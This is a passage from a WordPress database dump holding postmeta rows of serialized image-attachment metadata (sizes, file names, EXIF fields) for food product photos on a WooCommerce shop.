:{s:4:\"file\";s:72:\"IMG_1716_2048x2048_8955e421-6a7a-41bb-b50c-3d37b70843bd_880x-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:72:\"IMG_1716_2048x2048_8955e421-6a7a-41bb-b50c-3d37b70843bd_880x-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:72:\"IMG_1716_2048x2048_8955e421-6a7a-41bb-b50c-3d37b70843bd_880x-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:72:\"IMG_1716_2048x2048_8955e421-6a7a-41bb-b50c-3d37b70843bd_880x-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:72:\"IMG_1716_2048x2048_8955e421-6a7a-41bb-b50c-3d37b70843bd_880x-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:72:\"IMG_1716_2048x2048_8955e421-6a7a-41bb-b50c-3d37b70843bd_880x-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:72:\"IMG_1716_2048x2048_8955e421-6a7a-41bb-b50c-3d37b70843bd_880x-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:72:\"IMG_1716_2048x2048_8955e421-6a7a-41bb-b50c-3d37b70843bd_880x-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:72:\"IMG_1716_2048x2048_8955e421-6a7a-41bb-b50c-3d37b70843bd_880x-880x550.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:72:\"IMG_1716_2048x2048_8955e421-6a7a-41bb-b50c-3d37b70843bd_880x-550x587.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:587;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:72:\"IMG_1716_2048x2048_8955e421-6a7a-41bb-b50c-3d37b70843bd_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:72:\"IMG_1716_2048x2048_8955e421-6a7a-41bb-b50c-3d37b70843bd_880x-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:72:\"IMG_1716_2048x2048_8955e421-6a7a-41bb-b50c-3d37b70843bd_880x-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(12316,4993,'_wp_attached_file','2020/04/Nutty_Banana_Oatcakes_880x.jpg'),(12317,4993,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:400;s:4:\"file\";s:38:\"2020/04/Nutty_Banana_Oatcakes_880x.jpg\";s:5:\"sizes\";a:10:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:38:\"Nutty_Banana_Oatcakes_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:38:\"Nutty_Banana_Oatcakes_880x-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:38:\"Nutty_Banana_Oatcakes_880x-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:38:\"Nutty_Banana_Oatcakes_880x-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:38:\"Nutty_Banana_Oatcakes_880x-600x300.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:38:\"Nutty_Banana_Oatcakes_880x-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:38:\"Nutty_Banana_Oatcakes_880x-550x400.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:38:\"Nutty_Banana_Oatcakes_880x-550x400.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:38:\"Nutty_Banana_Oatcakes_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:38:\"Nutty_Banana_Oatcakes_880x-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(12318,4994,'_wp_attached_file','2020/04/pbtr_cup_2_880x.jpg'),(12319,4994,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:400;s:4:\"file\";s:27:\"2020/04/pbtr_cup_2_880x.jpg\";s:5:\"sizes\";a:10:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:27:\"pbtr_cup_2_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:27:\"pbtr_cup_2_880x-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"pbtr_cup_2_880x-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"pbtr_cup_2_880x-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:27:\"pbtr_cup_2_880x-600x300.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:27:\"pbtr_cup_2_880x-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:27:\"pbtr_cup_2_880x-550x400.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:27:\"pbtr_cup_2_880x-550x400.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:27:\"pbtr_cup_2_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:27:\"pbtr_cup_2_880x-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(12320,4995,'_wp_attached_file','2020/04/Potato_Fritters_880x.jpg'),(12321,4995,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:880;s:6:\"height\";i:590;s:4:\"file\";s:32:\"2020/04/Potato_Fritters_880x.jpg\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:32:\"Potato_Fritters_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:32:\"Potato_Fritters_880x-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:32:\"Potato_Fritters_880x-600x402.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:402;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"Potato_Fritters_880x-300x201.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:201;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"Potato_Fritters_880x-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:32:\"Potato_Fritters_880x-768x515.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:515;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:32:\"Potato_Fritters_880x-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:32:\"Potato_Fritters_880x-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:32:\"Potato_Fritters_880x-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:32:\"Potato_Fritters_880x-880x550.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:32:\"Potato_Fritters_880x-550x590.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:590;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:32:\"Potato_Fritters_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:32:\"Potato_Fritters_880x-600x402.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:402;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:32:\"Potato_Fritters_880x-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(12322,4996,'_wp_attached_file','2020/04/rasp2_880x.jpg'); INSERT INTO `wpvt_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES (12323,4996,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:400;s:4:\"file\";s:22:\"2020/04/rasp2_880x.jpg\";s:5:\"sizes\";a:10:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:22:\"rasp2_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:22:\"rasp2_880x-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"rasp2_880x-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"rasp2_880x-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:22:\"rasp2_880x-600x300.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:22:\"rasp2_880x-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:22:\"rasp2_880x-550x400.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:22:\"rasp2_880x-550x400.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:22:\"rasp2_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:22:\"rasp2_880x-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(12326,4795,'_thumbnail_id','4989'),(12331,4792,'_thumbnail_id','4990'),(12340,4791,'_thumbnail_id','4992'),(12345,4788,'_thumbnail_id','4993'),(12350,4786,'_thumbnail_id','4995'),(12355,4783,'_thumbnail_id','4991'),(12360,4780,'_thumbnail_id','4994'),(12365,4779,'_thumbnail_id','4988'),(12370,4775,'_thumbnail_id','4996'),(12373,4997,'_wp_attached_file','2020/04/IMG_1357_880x.jpg'),(12374,4997,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:880;s:6:\"height\";i:590;s:4:\"file\";s:25:\"2020/04/IMG_1357_880x.jpg\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:25:\"IMG_1357_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:25:\"IMG_1357_880x-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:25:\"IMG_1357_880x-600x402.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:402;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"IMG_1357_880x-300x201.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:201;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"IMG_1357_880x-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"IMG_1357_880x-768x515.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:515;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:25:\"IMG_1357_880x-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:25:\"IMG_1357_880x-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:25:\"IMG_1357_880x-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:25:\"IMG_1357_880x-880x550.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:25:\"IMG_1357_880x-550x590.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:590;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:25:\"IMG_1357_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:25:\"IMG_1357_880x-600x402.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:402;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:25:\"IMG_1357_880x-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1400676970\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(12375,4998,'_wp_attached_file','2020/04/pesto_94240780-a042-4135-9a51-18238209d2cd_880x.jpg'),(12376,4998,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:405;s:4:\"file\";s:59:\"2020/04/pesto_94240780-a042-4135-9a51-18238209d2cd_880x.jpg\";s:5:\"sizes\";a:10:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:59:\"pesto_94240780-a042-4135-9a51-18238209d2cd_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:59:\"pesto_94240780-a042-4135-9a51-18238209d2cd_880x-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:59:\"pesto_94240780-a042-4135-9a51-18238209d2cd_880x-300x203.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:203;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:59:\"pesto_94240780-a042-4135-9a51-18238209d2cd_880x-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:59:\"pesto_94240780-a042-4135-9a51-18238209d2cd_880x-600x300.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:59:\"pesto_94240780-a042-4135-9a51-18238209d2cd_880x-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:59:\"pesto_94240780-a042-4135-9a51-18238209d2cd_880x-550x405.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:405;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:59:\"pesto_94240780-a042-4135-9a51-18238209d2cd_880x-550x405.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:405;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:59:\"pesto_94240780-a042-4135-9a51-18238209d2cd_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:59:\"pesto_94240780-a042-4135-9a51-18238209d2cd_880x-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(12379,4800,'_thumbnail_id','4997'),(12384,4796,'_thumbnail_id','4998'),(12387,4999,'_wp_attached_file','2020/04/IMG_0901_2048x2048_a208f1bb-7b1e-483e-b53b-2355ce176286_880x.jpg'),(12388,4999,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:880;s:6:\"height\";i:587;s:4:\"file\";s:72:\"2020/04/IMG_0901_2048x2048_a208f1bb-7b1e-483e-b53b-2355ce176286_880x.jpg\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:72:\"IMG_0901_2048x2048_a208f1bb-7b1e-483e-b53b-2355ce176286_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:72:\"IMG_0901_2048x2048_a208f1bb-7b1e-483e-b53b-2355ce176286_880x-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:72:\"IMG_0901_2048x2048_a208f1bb-7b1e-483e-b53b-2355ce176286_880x-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:72:\"IMG_0901_2048x2048_a208f1bb-7b1e-483e-b53b-2355ce176286_880x-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:72:\"IMG_0901_2048x2048_a208f1bb-7b1e-483e-b53b-2355ce176286_880x-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:72:\"IMG_0901_2048x2048_a208f1bb-7b1e-483e-b53b-2355ce176286_880x-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:72:\"IMG_0901_2048x2048_a208f1bb-7b1e-483e-b53b-2355ce176286_880x-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:72:\"IMG_0901_2048x2048_a208f1bb-7b1e-483e-b53b-2355ce176286_880x-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:72:\"IMG_0901_2048x2048_a208f1bb-7b1e-483e-b53b-2355ce176286_880x-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:72:\"IMG_0901_2048x2048_a208f1bb-7b1e-483e-b53b-2355ce176286_880x-880x550.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:72:\"IMG_0901_2048x2048_a208f1bb-7b1e-483e-b53b-2355ce176286_880x-550x587.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:587;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:72:\"IMG_0901_2048x2048_a208f1bb-7b1e-483e-b53b-2355ce176286_880x-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:72:\"IMG_0901_2048x2048_a208f1bb-7b1e-483e-b53b-2355ce176286_880x-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:72:\"IMG_0901_2048x2048_a208f1bb-7b1e-483e-b53b-2355ce176286_880x-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s